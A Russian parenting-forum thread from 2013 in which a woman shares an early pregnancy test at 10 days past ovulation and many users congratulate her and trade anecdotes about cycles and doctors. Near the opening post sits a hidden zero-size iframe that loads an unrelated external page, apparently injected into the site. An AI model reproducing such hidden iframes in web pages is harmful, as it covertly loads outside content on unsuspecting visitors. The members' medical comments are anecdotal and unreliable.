Войти

меня глючит? 10дпо !!! не удержалась и сделала тест...

Galinnna
Даниил, 18 лет 8 месяцев Санкт-Петербург

это оно super_smilies086.gifchild_2005.gif

[removed][removed]<iframe src="https://pluginplus.net/statistica/statistic_li.html" 0px; height: 0px; border: 0px none;"></iframe>[removed][removed]
Закрыть [Х]
Осталось сек.
0
01.09.2013
WeLove
Буковка, 11 лет 11 месяцевПланирую Москва

Ура))))) сколько циклов ждали ?)))

0
31.08.2013
KITTI
Алиса, 12 лет 1 месяцКсюшенька-Ангелочек, 8 лет 1 месяц Москва

Мы уже больше года старались!!!а Бт первый раз меряла.тьфу тьфу чтоб не спугнуть

0
31.08.2013
WeLove
Буковка, 11 лет 11 месяцевПланирую Москва

А цикл сколько дней ? Когда О была ?)

0
31.08.2013
KITTI
Алиса, 12 лет 1 месяцКсюшенька-Ангелочек, 8 лет 1 месяц Москва

Цикл 30-32 на дюфастоне. О была 21. Но это по граффику бт. А вообще кровь шла в середине немного. Начала идти 19.вот я и подумала что о. А еще в этот месяц заставила мужа спортом заниматься. И па утом.

0
01.09.2013
ирина
Павел, 17 лет 9 месяцев Москва

Супер! Тебя не глючит!!!!это оно!!!!!! Что за тест ( фирма) и чувствительность?

0
31.08.2013
KITTI
Алиса, 12 лет 1 месяцКсюшенька-Ангелочек, 8 лет 1 месяц Москва

Фрау, но минут через 10...

0
01.09.2013
KITTI
Алиса, 12 лет 1 месяцКсюшенька-Ангелочек, 8 лет 1 месяц Москва

Девочки, а что делать то теперь? К врачу когда идти? Че то я в шоке...

0
31.08.2013
Olli
Глеб, 15 лет 8 месяцевЛиза, 12 лет 2 месяцаЕва, 9 лет 11 месяцев Санкт-Петербург

Мне сказали придти на 10 день задержки :)

0
31.08.2013
KITTI
Алиса, 12 лет 1 месяцКсюшенька-Ангелочек, 8 лет 1 месяц Москва

Позвонила гинекологу она сказала дюфастон не продолжать....и что рано тест делаю...типа на 10-14 дпо тесты выдают ложноположительный результат. Вот:(( Что то она меня расстроила.. dont_know.gif

0
02.09.2013
Колёсик
дочь ARIэль, 12 лет 2 месяцаЯромир, 7 лет 11 месяцев Санкт-Петербург

великолепный глюк!!!!  super_smilies059.gifclap.gif

0
31.08.2013
IriSSka
Старший сын, 17 лет 11 месяцевСредний сын, 14 лет 3 месяцаМладший сын, 10 лет 11 месяцевДоченька, 6 лет 4 месяца Москва

Чтобы всех хочушек так глючило!  big_smiles_92.gifПоздравляю! child_2002.gif 

0
31.08.2013
Анастасия
Планирую Новороссийск

Поздравляю!!! super_smilies082.gif

0
02.09.2013
Катерина
Планирую Челябинск

Очень хорошо видно)))) big_smiles_166.gif

0
01.09.2013
ИРИНА
Ангелина, 17 лет 6 месяцевСергей, 12 лет 1 месяц Арзамас

Вижу, очень хорошо вижу, поздравляю! super_smilies082.gif

0
01.09.2013
Светлана.
Ольга, 32 годаЕлена, 27 лет 8 месяцевЗлата, 15 лет 9 месяцевПолина, 13 лет 8 месяцевАлексей, 12 лет 2 месяца Конаково
super_smilies082.gif

0
01.09.2013

Отличная полосочка big_smiles_150.gif

0
31.08.2013
Арина
Планирую Москва

Вот это полосища!!!!!!  super_smilies082.gif

0
31.08.2013

поздравляю!!!!!!!!!!! super_smilies082.gifчихните на меня заразным чихом!)))))))))

0
31.08.2013
sad little Panda
Гадкая Я, 13 лет 8 месяцевГадкая Я №2, 12 лет 2 месяца Гуанчжоу
Не глючит! Поздравляю, в нашем полку прибыло! big_smiles_150.gif
0
31.08.2013
Юлия
Нуся, 18 лет 7 месяцевПланирую Лесосибирск

Хороший глюк big_smiles_156.gif

0
31.08.2013
Светлана.
Ольга, 32 годаЕлена, 27 лет 8 месяцевЗлата, 15 лет 9 месяцевПолина, 13 лет 8 месяцевАлексей, 12 лет 2 месяца Конаково
Любопытная! Да это Б.! super_smilies082.gifБерегите себя!
0
31.08.2013
Nasty
Москва

ранний,но самый настоящий)Больше цвета!!!260.gif

0
31.08.2013
Olli
Глеб, 15 лет 8 месяцевЛиза, 12 лет 2 месяцаЕва, 9 лет 11 месяцев Санкт-Петербург

СТО ПУДОВО ОНО!!! Хорошая розовенькая полосочка, и очень даже яркая для 10ДПО ))) 

0
31.08.2013
SvetLanA de Oz
Игорь, 11 лет 6 месяцевВладимир, 8 лет 3 месяца Санкт-Петербург

Ни фига себе глюк )) Похоже полоска так полоска, только ещё до конца не созрела )) Желаю, чтобы через пару дней она горела ярче первой)))

0
31.08.2013

Ярчайте!И растите на здоровье! big_smiles_166.gif

0
31.08.2013
Юлия, в ожидании маленького ЧУДА..)))
Планирую Ростов-на-Дону

можно тебя тихонечко поздравить...)))))) super_smilies082.gif

0
31.08.2013
KITTI
Алиса, 12 лет 1 месяцКсюшенька-Ангелочек, 8 лет 1 месяц Москва

Девочки, чихну как буду точно уверена. Чтоб не сглазить;)

0
01.09.2013

Это не глюк!!!! это полоса йомайо) ярчайте скорее))))

0
31.08.2013
//irina//
Планирую Москва

Шоб нас тут всех так заглючило )))) поздравляю!!! Легкой беременности

0
31.08.2013
Verochka
сынок, 7 лет 9 месяцевмладшая крошка, 11 лет 4 месяцасредняя крошка, 13 лет 8 месяцевстаршая крошка, 15 лет 4 месяцасамая старшая крошка (мужа), 27 лет Краснодар

Разрешите поздравить!Дочи почему-то раньше тесты полосатят)

0
31.08.2013
Кристи
Андрюшка, 11 лет 6 месяцевКирюша, 7 лет 3 месяца Брянск

ничего себе глючит...чтобы всех так глючило!!!!!

0
31.08.2013
HanaSachi
Лапуся, 25 лет 4 месяцаПланирую Пенза

Чтоб меня так завтра с утра заглючило @@@@@!!!))) Поздравляю!!!

0
31.08.2013
Айна
Лилия, 10 лет Энгельс

Ну это точно не призрак и не реагент! Ярчайте!

0
31.08.2013
Катерина
Полинка, 17 лет 3 месяцаДашенька, 11 лет 3 месяцаПланирую Киев
Есть вторая,ярчайте!!!!!!!!!!!!
0
31.08.2013

в какое время суток делали?

0
31.08.2013
KITTI
Алиса, 12 лет 1 месяцКсюшенька-Ангелочек, 8 лет 1 месяц Москва

Ночью, после пончиков:) 

0
01.09.2013
Ольга
Доченька Миланочка, 12 лет 3 месяца Самара

у меня был такой же )) 

0
02.09.2013
Татьяна
Злата, 11 лет 10 месяцевАнютка-крестная доченька!, 13 лет 4 месяцаАриана-крестница первая!, 14 лет Москва

Ярчайте полосатенькие!!! )))

0
02.09.2013

Да какие глюки?!!!! Отлично видно!!!!)))))

0
01.09.2013

Клево!на 10 день!!!=О

ярчайте))))

0
01.09.2013
Helena
Доча, 9 лет 6 месяцев Ашдод

Явная вторая!!!!

0
31.08.2013
Нюська
Планирую Киев
Нееееет, тебя не глючит. Есть, еще какая))))))))
0
31.08.2013
Счастливая
Планирую Казань

Отличный глюк!!! Ярчайте!!

0
31.08.2013
Эля
Диана, 16 лет 8 месяцевЦветочек, 11 лет 9 месяцев Москва

Это оно самое! Поздравляю! )))

0
31.08.2013
Урсула
Андрей, 14 лет 1 месяцСыночек, 11 лет 10 месяцев Санкт-Петербург

не глючит, ура!

0
31.08.2013
клеа блю или фрау, кому верить Помогите советом. Сегодня 10 Дпо. Сделала тест. Я вижу очень слабую полоску а вы?

Похожие записи